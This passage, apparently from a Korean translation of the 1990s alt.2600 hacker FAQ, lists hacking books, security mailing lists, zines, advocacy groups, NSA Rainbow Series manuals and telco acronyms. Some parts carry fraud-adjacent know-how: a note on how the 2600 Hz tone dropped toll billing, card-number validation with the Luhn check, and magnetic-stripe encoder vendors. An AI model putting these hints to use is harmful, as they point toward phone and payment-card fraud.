he Knightmare는 쓰레기 버리러 갈 때는 옷을 차려입을 필요가 없다는 유용한 충고를 하고 있다. The Knightmare의 가장 뛰어난 해킹은 Loompanics에서 이책을 출판하도록 한 것이다.
The Day The Phones Stopped
Author: Leonard Lee
Publisher: Primus / Donald I Fine, Inc.
Copyright Date: 1992
ISBN: 1-55611-286-6
완전 쓰레기이다. 미치광이의 정신발작이다.
Enquirer 잡지의 데이터보다 더 비사실적이다.
Information Warfare
Author: Winn Swartau
Publisher: Thunder Mountain Press
Copyright Date: 1994
ISBN: 1-56025-080-1
전자 정보전의 기술과 장비에 대한 잘 설명된 해설서
Author: Doug Richardson
Publisher: Salamander Press
Copyright Date:
ISBN: 0-668-06497-8
'Unauthorized Access' by Annaliza Savage
$25 on VH S format in 38-min
Savage Productions
1803 Mission St., #406
Santa Cruz, CA 95060
Hacker's '95 - a Phon-E & R.F. Burns Production
See the video Emmanuel Goldstein thought would have the Feds knocking
at his door. Coverage of Summercon'95 Coverage of Defcon III The big Y
fiasco at Summercon PMF (narc) interviews Emmanuel Goldstein & Eric
BloodAxe. Trip to Area 51 and interview with Psyhospy Coverage of the
Secret Service briefing on Operation Cyber Snare (recent cell busts)
Talks on Crypto, HERF, the Feds, etc. All information is presented
for educational purposes only. Not for sale to government or law
enforcement organizations. Running time aproximately 90 minutes.
$25.00 NTSC VHS
$35.00 PAL/Secam VHS
Custom Video Productions
(908)842-6378
videocvp@ix.netcom.com
Academic Firewalls
Registration Address: Send a message to majordomo@greatcircle.com
containing the line "subscribe firewalls user@host"
N The Alert
Registration Address: Send a message to request-alert@iss.net
containing the line "subscribe alert"
Bugtraq
Reflector Address: bugtraq@fc.net
Registration Address: bugtraq-request@fc.net
Cert Tools
Reflector Address: cert-tools@cert.org
Registration Address: cert-tools-request@cert.org
Computers and Society
Reflector Address: Comp-Soc@limbo.intuitive.com
Registration Address: taylor@limbo.intuitive.com
Coordinated Feasibility Effort to Unravel State Data
Reflector Address: ldc-sw@cpsr.org
Registration Address:
CPSR Announcement List
Reflector Address: cpsr-announce@cpsr.org
Registration Address:
CPSR - Intellectual Property
Reflector Address: cpsr-int-prop@cpsr.org
Registration Address:
CPSR - Internet Library
Reflector Address: cpsr-library@cpsr.org
Registration Address:
N Cypherpunks
Registration Address: Send a message to majordomo@toad.com
containing the line "subscribe cypherpunks"
DefCon Announcement List
Registration Address: Send a message to majordomo@fc.net containing
the line "subscribe dc-announce"
DefCon Chat List
Registration Address: Send a message to majordomo@fc.net containing
the line "subscribe dc-stuff"
N Discount Long Distance Digest
Registration Address: Send a message to: dld-request@webcom.com
containing the line "subscribe"
Electronic Payment
Registration Address: e-payment@cc.bellcore.com
IDS (Intruder Detection Systems)
Registration Address: Send a message to majordomo@wyrm.cc.uow.edu.au
containing the line "subscribe ids"
N Information Warfare
Registration Address: E-mail iw@all.net with a request to be added.
N Linux-Alert
Registration Address: majordomo@linux.nrao.edu
N Linux-Security
Registration Address: majordomo@linux.nrao.edu
Macintosh Security
Reflector Address: mac-security@eclectic.com
Registration Address: mac-security-request@eclectic.com
NeXT Managers
Registration Address: next-managers-request@stolaf.edu
PGP3 announcement list
Registration Address: pgp-announce-request@lsd.com
Subject: Your Name <user@host>
Body: *ignored*
Phiber-Scream
Registration Address: Send a message to listserv@netcom.com
containing the line "subscribe phiber-scream user@host"
phruwt-l (Macintosh H/P)
Registration Address: Send a message to filbert@netcom.com
with the subject "phruwt-l"
rfc931-users
Reflector Address: rfc931-users@kramden.acf.nyu.edu
Registration Address: brnstnd@nyu.edu
RSA Users
Reflector Address: rsaref-users@rsa.com
Registration Address: rsaref-users-request@rsa.com
WWW Security
Registration Address: www-security@ns2.rutgers.edu
2600 - The Hacker Quarterly
~~~~~~~~~~~~~~~~~~~~~~~~~~~
E-mail addresses: info@2600.com - to get info on 2600
index@2600.com - to get a copy of our index
meetings@2600.com - for info on starting your own meeting
subs@2600.com -- for subscription problems
letters@2600.com -- to send us a letter
articles@2600.com -- to send us an article
2600@2600.com -- to send us a general message
Subscription Address: 2600 Subscription Dept
PO Box 752
Middle Island, NY 11953-0752
Letters and article submission address: 2600 Editorial Dept
PO Box 99
Middle Island, NY 11953-0099
Phone Number: (516)751-2600
Fax Number: (516)474-2677
Voice BBS: (516)473-2626
Subscriptions: United States: $21/yr individual, $50 corporate.
Overseas: $30/yr individual, $65 corporate.
Gray Areas
~~~~~~~~~~
Gray Area는 법과 도덕성의 회색 재대를 조사하고 논쟁의 소지가 있거나, 비윤리적 불법적인 주
제를 다룬다. Gray Areas는 왜 해커가 해킹을 하는지 조사하고 일탈적 행위의 사회적 틀로서 해
킹을 규정한다.
E-Mail Address: grayarea@well.sf.ca.us
E-Mail Address: grayarea@netaxs.com
U.S. Mail Address: Gray Areas
PO Box 808
Broomall, PA 19008
Subscriptions: $26.00 4 issues first class
$34.00 4 issues foreign (shipped air mail)
Privacy Newsletter
~~~~~~~~~~~~~~~~~~
Privacy Newsletter 는 월간 뉴스레트로 독자들로 하여금 어떻게 프라이버시를 얻고 유지하는지
에 대해 알려주는 것을 목적으로 한다.
E-Mail Address: privacy@interramp.com
Subscription Address: Privacy Newsletter
P.O. Box 8206
Philadelphia, PA 19101-8206
Subscriptions: $99/yr (US) $149/yr (Overseas)
Wired
~~~~~
Subscription Address: subscriptions@wired.com
or: Wired
PO Box 191826
San Francisco, CA 94119-9866
Letters and article submission address: guidelines@wired.com
or: Wired
544 Second Street
San Francisco, CA 94107-1427
Subscriptions: $39/yr (US) $64/yr (Canada/Mexico)
$79/yr (Overseas)
Nuts & Volts
~~~~~~~~~~~~
T& L Publications
430 Princeland Court
Corona, CA 91719
(800)783-4624 (Voice) (Subscription Only Order Line)
(909)371-8497 (Voice)
(909)371-3052 (Fax)
CIS: 74262,3664
Cybertek: The Cyberpunk Technical Journal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
P.O. Box 64
Brewster, NY 10509
Frequency: Bimonthly
Domestic Subscription Rate: $15/year (6 issues)
PrivateLine
~~~~~~~~~~~
5150 Fair Oaks Blvd. #101-348
Carmichael, CA 95608 USA
E-Mail: privateline@delphi.com
Subscriptions: $24 a year for six issues
Text of back issues are at the etext archive at Michigan. Gopher over
or ftp to: etext.archive.umich.edu/pub/Zines/PrivateLine
CoTNo: Communications of The New Order ftp.etext.org /pub/Zines/CoTNo
Empire Times ftp.etext.org /pub/Zines/Emptimes
FEH ftp.fc.net /pub/defcon/FEH
The Infinity Concept infonexus.com
/pub/Philes/Zines/TheInfinityConcept
Phrack ftp.fc.net /pub/phrack
Computer Professionals for Social Responsibility (CPSR)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CPSR은 컴퓨터 전문가와 컴퓨터 사용자가 정보 기술을
사용하는 데 대한 책임을 부여하고 컴퓨터를 이용하는 모든 사람이
공공 논쟁에 참여하도록 한다. 기술적인 전문가로서 CPSR 회원은 인민과
정책입안자에게 권력과 공약 그리고 컴퓨터 기술의 제한사항 등에
대한 실제적인 평가를 제공한다. 의식있는 시민의 기관으로서 CPSR은
공공의 관심을 컴퓨터의 응용에 대한 비판적인 선택과 그 선택이 사회에
미치는 영향으로 돌린다. 문제가 없는 기술적 정보와 정책 개발 노하우를
비교하여 CPSR은 최소한의 비용으로 최대의 효과와 기술 정책의 형성에
대해 광범위한 공공의 참여를 촉진한다. 수행하는 프로젝트는 다음과
같은 5 가지 원칙에 기인한다.
* 기술만으로 정치적 사회적 문제를 해결할 수 있다는 가정에 도전한다.
* 비판적으로 컴퓨터에서의 사회와 기술 문제를 검토한다.
* 삶의 질을 높이는 데 컴퓨터 기술의 이용을 권장한다.
CPSR Membership Categories
75 REGULAR MEMBER
50 Basic member
200 Supporting member
500 Sponsoring member
1000 Lifetime member
20 Student/low income member
50 Foreign subscriber
50 Library/institutional subscriber
CPSR National Office
P.O. Box 717
Palo Alto, CA 94301
415-322-3778
415-322-3798 (FAX)
E-mail: cpsr@csli.stanford.edu
Electronic Frontier Foundation (EFF)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Electronic Frontier Foundation (EFF)은 컴퓨터 기반 통신의 자유와 공개성의 발전시킬 수
있는 정책이나 활동을 추구한다. 회원에 의해 운영되고,
비영리 단체로서 정보화 시대에서 새새로운 공공 이익 집단이 필요하다는
신념에서 나왔다. 이는 이 기관(집단)이 새로운 컴퓨터 통신 기술의
민주적인 잠재력을 보호하고 확장하는 것에 목적이 있다는 것이다.
시작부터, EFF는 기술적, 법률적 공공 정책의 전문성을 결합하는 기관이며
그리고 이러한 기술을 새로운 통신 매체가 탄생할 때마다 발생하는
다양한 문제와 관심에 적용한다. 회원비는 학생은 $20.00/년 이며
정규 회원의 경우 $40.00/년 이고 기관 회원은 $100.00/년이다.
The Electronic Frontier Foundation, Inc.
1001 G Street, NW
Suite 950 East
Washington, D.C. 20001
(202)544 9237
(202)547 5481 FAX
Internet: eff@eff.org
Free Software Foundation (FSF) and GNU
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Free Software Foundation 은 사람들이 컴퓨터 프로그램을 이용, 복사, 변경, 재배포하는 권리에 대한 제한을 제거하는 데 목적을 둔다. 컴퓨터를 이용하는 모든 분야에서 무료 소프트웨어의 사용과 개발을 돕는다. 특히, "GNU" ("GNU's Not Unix", "그누"라고 발음)라는 Unix와 위로 호환성을 가지는 자체로 완벽하고 통합된 소프트웨어를 만든다. 이 시스템의 대부분은 이미 사용되고 배포되고 있다. "무료"라는 단어는 자유를 의미하지 가격이 공짜라는 것은 아니다. GNU 소프트웨어를 얻기 위해서 돈을 지불하거나 지불하지 않을 수 있다. 그러나, 일단 그것을 입수하면 두가지 특정 자유를 가지게 된다. 첫째, 프로그램을 복사해서 친구나 동료에게 줄 수 있다. 둘째, 소스 코드에 완전히 접근이 가능하므로 소프트웨어를 원하는대로 변경할 수 있다. 소스를 연구하고 어떻게 그러한 소프트웨어를 작성하는지에 대해서 배울 수 있다. 프로그램을 포트하고 향상하고 변경된 것을 다른 사람과 공유할 수 있다. GNU 소프트웨어를 재배포할 때, 배포에 대한 비용을 물리거나 아니면 공짜로 줄 수 있다. 이 때 GPL(GNU General Public License)와 소스 코드를 포함해야 한다.
Free Software Foundation, Inc. Telephone: +1-617-876-3296
673 Massachusetts Avenue Fax: +1-617-492-9057
Cambridge, MA 02139-3309 USA Fax (in Japan): 0031-13-2473 (KDD)
Electronic mail: gnu@prep.ai.mit.edu 0066-3382-0158 (IDC)
GNU는 사용자가 컴퓨터를 이용하는 데 완벽한 통합 컴퓨팅
환경을 갖추려한다. 사무실이나 가정에서 사용하는 프로그래머이던
아니면 일반 사용자이든간에. 핵심은 운영체제로 컴퓨터에서 다른
프로그램이 수행할 수 있도록 하는 커널이라고 불리우는 중앙 프로그램으로
구성되어 있다. 그리고 파일을 처리할 수 있는 부차적인 많은 수의
프로그램들이 있다. Free Software Foundation은 Hurd라고 불리는
진보된 커널을 개발하고 있다. 완벽한 체계는 컴파일러와 디버거와
같은 프로그래머를 위한 도구를 가진다. 또한 펀집기, 스케치패드,
칼랜더, 계산기, 스프래드쉬트, 데이터베이서, 전자 우편 리더와 인터넷
네비게이트 등도 포함한다. FSF는 이미 운영체제에서 사용되는 대부분의
프로그램, 프로그래머들이 자주 사용하는 모든 도구와 그 이상을 제공하고
있다.
The League for Programming Freedom (LPF)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
League for Programming Freedom은 "look and feel" 저작권 재판을 통해 공통 유저 인터페이스을 독점하려는 시도에 대해 반대하는 사람들의 기관이다. 이들 중 일부는 프로그래머로 자신의 작업을 방해할지도 모르는 독점에 대해 걱정하고 있다. 또 다른 일부는 자신들이 알고 있는 인터페이스와 호환이 되는 새로운 컴퓨터 시스템을 원한다. 어떤 이는 Richard P. Gabriel와 같은 컴퓨터 하드웨어나 소프트웨어 회사의 창시자나 John McCarthy, Marvin Minsky, Guy L. Steele, Jr., Robert S. Boyer 와 Patrick Winston같은 교수나 연구자들이다. "Look and feel" 재판은 새로운 형태의 관주도의 독점을 이전 어느 것보다 광범위하게 만들어 낸다. 이러한 형태의 사용자 인터페이스 체계 저작권은
lawsuits aim to create a new class of government-
enforced monopolies broader in scope than ever before. Such a system
of user-interface copyright would impose gratuitous incompatibility,
reduce competition, and stifle innovation.
이러한 문제를 사용자 인터페이스 저작권을 막음으로서 해결하려 한다. 1986년 까지의 저작권법에 의한 저작권에 대해서 반대하지는 않는다. -- 특정 프로그램에 대한 저작권. 목표는 기존의 프로그램과 관행에 따른 프로그램과 호환되는 새로운 프로그램을 작성할 수 있는 프로그래머들의 전통적인 자유를 박탈하는 저작권 체계의 변화를 막으려는 것이다. 직업이 있는 전문가의 경우 $42의 개인 연회원비가 있으며 다른 사람들은 $21이다. 운동자에 대해 감사한다. 그리고 시간을 투자할 수 없는 회원도 환영한다. 연락은 전화 (617) 243-4091, 또는 인터넷 전자우편 league@prep.ai.mit.edu, 또는 다음 주소로 편지를 쓰기 바란다.
League for Programming Freedom
1 Kendall Square #143
P.O. Box 9171
Cambridge, MA 02139 USA
SotMesc
~~~~~~~
1989에 창설된 SotMesc는 컴퓨터 사회의 통합과 결속을
유지하는 데 목적을 둔다. 컴퓨터 교육, 자유 그리고 효율성을 축진하여
모든 컴퓨터 사용자에게 프라이버시를 유지하면서 자유를 보장할 수
있다고 믿는다. SotMesc는 CSP 인터넷 메일링 리스트를 운영하고 the
SotMesc Scholarship Fund, and the SotMesc Newsletter를 운영하고
있다. SotMesc는 일부 회원비로 재정을 충당하고 기부금으로 재원을
충당하지만 대부분은 해킹, 크래킹, 프리킹, 전자공학, 인터넷과 바이러스
정보 그리고 디스크내의 프로그램과 많은 인쇄 매체를 판매함으로서
충당한다. SotMesc 회원비는 학생은 $20이고 정규 회원은 $40이다.
SotMESC
P.O. Box 573
Long Beach, MS 39560
Computer Emergency Response Team (CERT)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CERT 는 Computer Emergency Response Team 으로 Defense Advanced Research Projects
Agency (DARPA)에 의해 1988년 12월 인터넷 웜사건을
계기로 그 필요성이 대두되어 설립되었다. CERT 임무는 인터넷 공동체와
함께 일하여 인터넷 호스트완 연관된 컴퓨터 보안 사건에 대응하는
능력을 기르는 것이며 컴퓨터 사회가 컴퓨터 보안 문제를 인식하는
데 주독적인 노력을 기울이고, 현존하는 시스템의 보안을 향상하는
데 목적을 둔 연구를 수행하는 것에 있다. CERT 제품과 서비스에는
24시간 기술 지원이 있어 컴퓨터 보안 사간에 대응하고 제품 취약성
지원, 기술적 문서, 그리고 세미나 등을 포함한다. 또한, 팀에서는
많은 메일링 리스트(CERT advisory 포함)를 운영하고 anonymous FTP
서버 - cert.org(192.88.209.5)를 운영하여 보안 관련 문서, 이전의
CERT advisory문서와 도구들을 제공하고 있다.
CERT 연락 정보
U.S. mail address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh, PA 15213-3890
U.S.A.
Internet E-mail address
cert@cert.org
Telephone number
(412)268-7090 (24-hour hotline)
CERT Coordination Center personnel answer
7:30 a.m.- 6:00 p.m. EST(GMT-5)/EDT(GMT-4), on call for
emergencies during other hours.
FAX number
(412)268-6989
Off The Hook New York 99.5 FM Tue 8pm EST
Full Disclosure Live Short Wave WWCR 5065 khz Sun 8pm EST
Full Disclosure Live Oil City, PA WOYL AM-1340 Sun 8pm EST
Full Disclosure Live Satellite Telstar 302 (T2),
Ch 21, 5.8 Sun 8pm EST
해커에게 관심가는 FAQ(frequentlry asked question)는무엇인가?
Frequently Asked Questions "Hacking Novell Netware"
Author: Simple Nomad <sn@spyder.org>
ftp: jumper.mcc.ac.uk /pub/security/netware/faq.zip
ftp: ftp.fastlane.net /pub/nomad/nw/faq.zip
ftp: ftp.best.com /pub/almcepud/hacks/faq.zip
http://resudox.net/bio/mainpage.html
http://www.hookup.net/~apayne/nwhack.html
The PGP Attack FAQ
Author: Route [daemon9@netcom.com / route@infonexus.com]
ftp: infonexus.com /pub/Philes/Cryptography/PGPattackFAQ.txt.gz
Mac Hack FAQ: Defeating Security
Author: AX1P (an149689@anon.penet.fi)
Frequently Asked Questions About Red Boxing
Author: Mr. Sandman (an132432@anon.penet.fi)
VMS FAQ (Frequently Ask Questions)
Author: The Beaver (beaver@upperdck.blkbox.com)
Anonymous FTP FAQ
Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.
ftp: ftp.iss.net /pub/faq/anonftp
Compromise FAQ: What if your Machines are Compromised by an Intruder
Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.
ftp: ftp.iss.net /pub/faq/compromise
Security Patches FAQ
Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.
ftp: ftp.iss.net /pub/faq/patch
Sniffer FAQ
Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.
ftp: ftp.iss.net /pub/faq/sniff
Vendor Security Contacts: Reporting Vulnerabilities and Obtaining New Patches
Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.
ftp: ftp.iss.net /pub/faq/vendor
Cryptography FAQ
Author: The Crypt Cabal
ftp: rtfm.mit.edu /pub/usenet-by-group/sci.crypt/
Firewalls FAQ
Author: Marcus J. Ranum (mjr@ss1.lightspeed.net)
ftp: rtfm.mit.edu /pub/usenet-by-group/comp.security.misc/
Buying a Used Scanner Radio
Author: parnass@att.com (Bob Parnass, AJ9S)
ftp: rtfm.mit.edu /pub/usenet-by-group/rec.radio.scanner/
How to Find Scanner Frequencies
Author: parnass@att.com (Bob Parnass, AJ9S)
ftp: rtfm.mit.edu /pub/usenet-by-group/rec.radio.scanner/
Introduction to Scanning
Author: parnass@att.com (Bob Parnass, AJ9S)
ftp: rtfm.mit.edu /pub/usenet-by-group/rec.radio.scanner/
Low Power Broadcasting FAQ
Author: Rick Harrison.
ftp: rtfm.mit.edu /pub/usenet-by-group/alt.radio.pirate/
RSA Cryptography Today FAQ
Author: Paul Fahn
ftp: rtfm.mit.edu /pub/usenet-by-group/sci.crypt/
VIRUS-L comp.virus Frequently Asked Questions (FAQ)
Author: Kenneth R. van Wyk <krvw@cert.org>
ftp: rtfm.mit.edu /pub/usenet-by-group/comp.virus/
Where to get the latest PGP (Pretty Good Privacy) FAQ
Author: mpj@csn.net (Michael Johnson)
ftp: rtfm.mit.edu /pub/usenet-by-group/alt.security.pgp/
alt.locksmithing answers to Frequently Asked Questions (FAQ)
Author: spike@indra.com (Joe Ilacqua)
ftp: rtfm.mit.edu /pub/usenet-by-group/alt.locksmithing/
comp.os.netware.security FAQ
Author: Fauzan Mirza <F.U.Mirza@sheffield.ac.uk>
ftp: rtfm.mit.edu /pub/usenet-by-group/comp.os.netware.security/
rec.pyrotechnics FAQ
Author: zoz@cs.adelaide.edu.au (Hans Josef Wagemueller)
ftp: rtfm.mit.edu /pub/usenet-by-group/rec.pyrotechnics/
자기띠(magnetic stripe)의 인코더(encoder)와 디코더(decoder)는 어디서 구입하나?
CPU Advance
PO Box 2434
Harwood Station
Littleton, MA 01460
(508)624-4819 (Fax)
Omron Electronics, Inc.
One East Commerce Drive
Schaumburg, IL 60173
(800)556-6766 (Voice)
(708)843-7787 (Fax)
Security Photo Corporation
1051 Commonwealth Avenue
Boston, MA 02215
(800)533-1162 (Voice)
(617)783-3200 (Voice)
(617)783-1966 (Voice)
Timeline Inc,
23605 Telo Avenue
Torrence, CA 90505
(800)872-8878 (Voice)
(800)223-9977 (Voice)
Alltronics
2300 Zanker Road
San Jose CA 95131
(408) 943-9774 Voice
(408) 943-9776 Fax
(408) 943-0622 BBS
Part Number: 92U067
Atalla Corp
San Jose, CA
(408) 435-8850
Orange Book
DoD 5200.28-STD
Department of Defense Trusted Computer System Evaluation Criteria
Green Book
CSC-STD-002-85
Department of Defense Password Management Guideline
Yellow Book
CSC-STD-003-85
Computer Security Requirements -- Guidance for Applying the Department
of Defense Trusted Computer System Evaluation Criteria in Specific
Environments
Yellow Book
CSC-STD-004-85
Technical Rationale Behind CSC-STD-003-85: Computer Security
Requirements. Guidance for Applying the Department of Defense Trusted
Computer System Evaluation Criteria in Specific Environments.
Tan Book
NCSC-TG-001
A Guide to Understanding Audit in Trusted Systems
Bright Blue Book
NCSC-TG-002
Trusted Product Evaluation - A Guide for Vendors
Neon Orange Book
NCSC-TG-003
A Guide to Understanding Discretionary Access Control in Trusted
Systems
Teal Green Book
NCSC-TG-004
Glossary of Computer Security Terms
Red Book
NCSC-TG-005
Trusted Network Interpretation of the Trusted Computer System
Evaluation Criteria
Orange Book
NCSC-TG-006
A Guide to Understanding Configuration Management in Trusted Systems
Burgundy Book
NCSC-TG-007
A Guide to Understanding Design Documentation in Trusted Systems
Dark Lavender Book
NCSC-TG-008
A Guide to Understanding Trusted Distribution in Trusted Systems
Venice Blue Book
NCSC-TG-009
Computer Security Subsystem Interpretation of the Trusted Computer
System Evaluation Criteria
Aqua Book
NCSC-TG-010
A Guide to Understanding Security Modeling in Trusted Systems
Dark Red Book
NCSC-TG-011
Trusted Network Interpretation Environments Guideline -- Guidance for
Applying the Trusted Network Interpretation
Pink Book
NCSC-TG-013
Rating Maintenance Phase -- Program Document
Purple Book
NCSC-TG-014
Guidelines for Formal Verification Systems
Brown Book
NCSC-TG-015
A Guide to Understanding Trusted Facility Management
Yellow-Green Book
NCSC-TG-016
Guidelines for Writing Trusted Facility Manuals
Light Blue
NCSC-TG-017
A Guide to Understanding Identification and Authentication in Trusted
Systems
Light Blue Book
NCSC-TG-018
A Guide to Understanding Object Reuse in Trusted Systems
Blue Book
NCSC-TG-019
Trusted Product Evaluation Questionnaire
Gray Book
NCSC-TG-020A
Trusted Unix Working Group (TRUSIX) Rationale for Selecting
Access Control List Features for the Unix System
Lavender Book
NCSC-TG-021
Trusted Data Base Management System Interpretation of the Trusted
Computer System Evaluation Criteria
Yellow Book
NCSC-TG-022
A Guide to Understanding Trusted Recovery in Trusted Systems
Bright Orange Book
NCSC-TG-023
A Guide to Understandng Security Testing and Test Documentation in
Trusted Systems
Purple Book
NCSC-TG-024 (Volume 1/4)
A Guide to Procurement of Trusted Systems: An Introduction to
Procurement Initiators on Computer Security Requirements
Purple Book
NCSC-TG-024 (Volume 2/4)
A Guide to Procurement of Trusted Systems: Language for RFP
Specifications and Statements of Work - An Aid to Procurement
Initiators
Purple Book
NCSC-TG-024 (Volume 3/4)
A Guide to Procurement of Trusted Systems: Computer Security Contract
Data Requirements List and Data Item Description Tutorial
+Purple Book
+NCSC-TG-024 (Volume 4/4)
+A Guide to Procurement of Trusted Systems: How to Evaluate a Bidder's
+Proposal Document - An Aid to Procurement Initiators and Contractors
Green Book
NCSC-TG-025
A Guide to Understanding Data Remanence in Automated Information
Systems
Hot Peach Book
NCSC-TG-026
A Guide to Writing the Security Features User's Guide for Trusted Systems
Turquiose Book
NCSC-TG-027
A Guide to Understanding Information System Security Officer
Responsibilities for Automated Information Systems
Violet Book
NCSC-TG-028
Assessing Controlled Access Protection
Blue Book
NCSC-TG-029
Introduction to Certification and Accreditation
Light Pink Book
NCSC-TG-030
A Guide to Understanding Covert Channel Analysis of Trusted Systems
C1 Technical Report-001
Computer Viruses: Prevention, Detection, and Treatment
*C Technical Report 79-91
*Integrity in Automated Information Systems
*C Technical Report 39-92
*The Design and Evaluation of INFOSEC systems: The Computer Security
*Contributions to the Composition Discussion
NTISSAM COMPUSEC/1-87
Advisory Memorandum on Office Automation Security Guideline
--
You can get your own free copy of any or all of the books by writing
or calling:
INFOSEC Awareness Division
ATTN: X711/IAOC
Fort George G. Meade, MD 20755-6000
Barbara Keller
(410) 766-8729
If you ask to be put on the mailing list, you'll get a copy of each new
book as it comes out (typically a couple a year).
[* == I have not personally seen this book]
[+ == I have not personally seen this book, and I believe it may not]
[ be available]
Alt.2600는 Usenet newsgroup으로 2600 잡지에 대한 논의를 위한 내용을 포함한다.
Atari의 2600 게임 머신을 위한 잡지가 아니다. Len@netsys.com이
Emmanuel Goldstein의 추전에 의해 이 뉴스그룹을 만들었다. Emmanuel은
2600의 편집자/발행인이다. Atari 머신에 대한 포스팅이 빗발친 다음
alt.atri.2600이 alt.2600으로 잘못들어온 포스팅을 받기 위해 만들어졌다.
Atari 2600 사람들은 rec.games.video.classic로 가기 바란다.
2600Hz는 전화 프리커(phreak)이 80년대에 사용하던
것이고 현재는 일부의 사람들이 사용하고 있다. 2600 헤르츠의 음은
네트워크를 탐험하는 첫 번째 단계이다.
A note from Emmanuel Goldstein:
"The Atari 2600 has NOTHING to do with blue boxes or telephones
or the 2600 hertz tone. The 2600 hertz tone was simply the first
step towards exploring the network. If you were successful at
getting a toll call to drop, then billing would stop at that
point but there would be billing for the number already dialed
up until the point of seizure. 800 numbers and long distance
information were both free in the past and records of who called
what were either non-existent or very obscure with regards to
these numbers. This, naturally, made them more popular than
numbers that showed up on a bill, even if it was only for
a minute. Today, many 800 numbers go overseas, which provides
a quick and free way into another country's phone system
which may be more open for exploration."
2600이 온라인 형태로 존재하는가?
없음.
서점에서 2600을 구할 수 없다면 어떻게 해야 하나?
구독하라. 또는 2600가 있어야 할 서점을 2600에 알려주라.
서점이름과 주소를 빼먹지 말 것.
2600을 가판대에서 사는 것보다 주문하는 것이 왜 더 비싼가?
Emmauel Goldstein의 말 :
2600을 1988년부터 가판대에서 똑같은 가격 4달러에
팔아왔다. 그리고 할 수 있는 한 계속 그 가격으로 판매하고 싶다.
동시에 구독자에게는 21달러가 정당한 가격이다. 이 가격에는 우표와
관리 등의 가격이 포함된다. 구독자는 어디서 잡지를 구해야 하는지
걱정할 필요가 없다. 가판대에서 팔기 몇주전에 잡지를 볼 수 있고
2600 시장의 무료광고를 볼 수 있다.
이러한 것은 출판 산업에서 흔한 일은 아니다. 뉴욕
타임즈는 예를 들어 가판대에서 $156 이 들어야 살 수 있고, 집에
배달할 경우 $234.75이다.
TLA Three Letter Acronym
ACL Access Control List
PIN Personal Identification Number
TCB Trusted Computing Base
ALRU Automatic Line Record Update
AN Associated Number
ARSB Automated Repair Service Bureau
ATH Abbreviated Trouble History
BOC Bell Operating Company
BOR Basic Output Report
BOSS Business Office Servicing System
CA Cable
COE Central Office Equipment
COSMOS Computer System for Main Frame Operations
CMC Construction Maintenance Center
CNID Calling Number IDentification
CO Central Office
COCOT Customer Owned Coin Operated Telephone
CRSAB Centralized Repair Service Answering Bureau
DID Direct Inbound Dialing
DDD Direct Distance Dialing
ECC Enter Cable Change
LD Long Distance
LMOS Loop Maintenance Operations System
MLT Mechanized Loop Testing
NPA Numbering Plan Area
PBX Private Branch Exchange
POTS Plain Old Telephone Service
RBOC Regional Bell Operating Company
RSB Repair Service Bureau
SS Special Service
TAS Telephone Answering Service
TH Trouble History
TREAT Trouble Report Evaluation and Analysis Tool
LOD Legion of Doom
HFC Hell Fire Club
TNO The New Order
ACiD Ansi Creators in Demand
CCi Cybercrime International
FLT Fairlight
iCE Insane Creators Enterprise
iNC International Network of Crackers
NTA The Nocturnal Trading Alliance
PDX Paradox
PE Public Enemy
PSY Psychose
QTX Quartex
RZR Razor (1911)
S!P Supr!se Productions
TDT The Dream Team
THG The Humble Guys
THP The Hill People
TRSI Tristar Red Sector Inc.
UUDW Union of United Death Workers
내가 바른 신용카드 번호를 가지고 있는지 어떻게 획인하나?
신용카드는 Luhn Check Digit Algorithm을 사용한다.
이 알고리즘은 주요 목적은 데이터의 오류를 찾는 것이다. 그리고
약한 보안 기능도 가지고 있다.
짝수의 자리수를 가지는 번호의 카드에 대해서, 홀 수인
자리의 숫자를 2배로하고 9보다 큰 숫자의 경우 9를 뺀다. 짝수 자리와
2배한 홀수자리 수를 더하면 그 결과가 10의 배수가 되어야 한다.
그렇지 않다면 잘못된 카드이다. 카드가 홀수자리의 번호라면, 짝수
자리 숫자를 2배해서 똑같이 계산하면 된다.
표준 카드는 3개의 트랙또는 3개의 트랙의 조합이 있다.
트랙 1은 처음으로 표준화된 트랙이다. 국제 항공 운수
연합(Internetional Air Transportation Association; IATA)에서 개발하였고
아직도 그 목적으로 사용하기 위해 예약되어 있다. 210bpi로 79자정도가
들어간다. 주 계정 번호와(18 자리까지) 이름(26자의 영문 숫자)를
포함한다.
트랙 2는 미국 은행가 연합(American Bankers Association;
ABA)에서 온라인 트랜잭션을 위해서 개발했다. 75bpi로 40개의 숫자를
넣을 수 있는 공간이 있다. 암호화된 PIN과, 국가번호, 통화 단위,
허용된 금액, 계정정도와 다른 제한 사항이 들어 있다.
자세한 것은 ANSI/ISO 7811/1-5 를 읽기 바란다. 이
문서는 미국 은행가 연합에서 볼 수 있다.
Hackers : Heroes of the Computer Revolution, Steven Levy 저발췌
컴퓨터에 접근하는 것 - 그리고 세상이 어떻게 돌아가는지
알려줄 수 있는 어떤 것 -은 전체적이고 무제한이어야 한다. 항상
실제적인 명령에 따른다.
모든 정보는 자유로와야 한다.
공권력을 불신한다. 지역분권을 지향한다.
해커는 해킹 능력으로 평가되어야지 학위나, 나이, 인종,
지위와 같은 잘못된 기준으로 평가되어서는 안 된다.
컴퓨터에서 미와 예술을 창조할 수 있다.
컴퓨터는 인생을 나아지게 한다.